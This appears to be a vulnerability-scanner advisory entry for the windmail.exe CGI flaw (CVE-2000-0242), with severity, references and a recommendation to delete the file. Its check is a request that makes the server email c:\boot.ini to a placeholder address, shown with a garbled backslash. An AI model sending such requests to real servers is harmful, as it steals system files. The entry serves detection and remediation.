| VID |
21101 |
| Severity |
40 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
CGI |
| Detailed Description |
"windmail.exe" CGI is installed in the relevant web-server. Some components of this version have flaws which perform arbitrary commands by remote. (thru pipe-command) You can check by requesting like the following,
GET/cgi-bin/windmail.exe?-n%20c:£Üboot.ini%
20myid@myaddress.com
(myid@myaddress.com should alternate with actual e-mail address.)
* References:
http://www.securityfocus.com/bid/1073
http://www.iss.net/security_center/static/4187.php |
| Recommendation |
Delete the "windmail.exe" file from the /cgi-bin directory |
| Related URL |
CVE-2000-0242 (CVE) |
| Related URL |
(SecurityFocus) |
| Related URL |
(ISS) |
|
